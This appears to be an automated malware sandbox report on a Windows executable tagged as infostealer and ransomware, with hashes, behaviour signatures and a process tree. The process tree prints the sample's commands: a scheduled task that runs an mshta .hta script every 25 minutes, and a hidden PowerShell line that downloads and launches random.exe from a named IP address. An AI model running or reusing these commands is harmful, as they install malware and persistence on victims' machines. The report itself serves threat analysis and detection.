Resubmissions

29/03/2025, 12:48

250329-p16hqsttbw 10

29/03/2025, 09:47

250329-lsnfea1ses 10

Analysis

  • max time kernel
    31s
  • max time network
    35s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    29/03/2025, 12:48

General

  • Target

    2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    5ec95a42b16d80c72d17cc6d0bac58de

  • SHA1

    9cfd9221606e1acfef1ea5f6f4bf88080822d5db

  • SHA256

    f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b

  • SHA512

    ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b

  • SSDEEP

    24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:976
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn lLLMZmaCxQY /tr "mshta C:\Users\Admin\AppData\Local\Temp\MMIsvBXfW.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:556
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn lLLMZmaCxQY /tr "mshta C:\Users\Admin\AppData\Local\Temp\MMIsvBXfW.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3916
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\MMIsvBXfW.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0XTWCUPQGFVENWZXK3AOM3VSNBVCXNG5.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5136
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4072
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3468

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\MMIsvBXfW.hta

      Filesize

      717B

      MD5

      545de3d2387b10de27d158e5e63acf80

      SHA1

      c34778c7d9779fdd7ab2369ad0cb0e0f86cec45c

      SHA256

      2643401b12d6a4ffd9cdb25ddbc334a13cc1764b86116bbc923ad2b689ff6b1c

      SHA512

      c581caf69573ae1c71d5752bd82b0011f01641abb7c9ce21ad36934b537d22e63d0fb1a2f119137137a82aa84fb230b592cdc5bf1f186368252d3ec20709009c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzmk0wup.qe4.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4072-23-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-27-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-28-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-29-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-30-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-31-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-32-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-22-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-21-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/4072-33-0x000002628F950000-0x000002628F951000-memory.dmp

      Filesize

      4KB

    • memory/5136-17-0x0000000005C90000-0x0000000005CAE000-memory.dmp

      Filesize

      120KB

    • memory/5136-19-0x00000000073D0000-0x0000000007A4A000-memory.dmp

      Filesize

      6.5MB

    • memory/5136-18-0x0000000005CE0000-0x0000000005D2C000-memory.dmp

      Filesize

      304KB

    • memory/5136-4-0x0000000004B30000-0x0000000004B52000-memory.dmp

      Filesize

      136KB

    • memory/5136-20-0x00000000061D0000-0x00000000061EA000-memory.dmp

      Filesize

      104KB

    • memory/5136-2-0x0000000002620000-0x0000000002656000-memory.dmp

      Filesize

      216KB

    • memory/5136-16-0x0000000005930000-0x0000000005C87000-memory.dmp

      Filesize

      3.3MB

    • memory/5136-3-0x0000000005260000-0x000000000592A000-memory.dmp

      Filesize

      6.8MB

    • memory/5136-6-0x0000000004FE0000-0x0000000005046000-memory.dmp

      Filesize

      408KB

    • memory/5136-5-0x0000000004F00000-0x0000000004F66000-memory.dmp

      Filesize

      408KB

    • memory/5136-35-0x0000000007220000-0x00000000072B6000-memory.dmp

      Filesize

      600KB

    • memory/5136-36-0x00000000071B0000-0x00000000071D2000-memory.dmp

      Filesize

      136KB

    • memory/5136-37-0x0000000008000000-0x00000000085A6000-memory.dmp

      Filesize

      5.6MB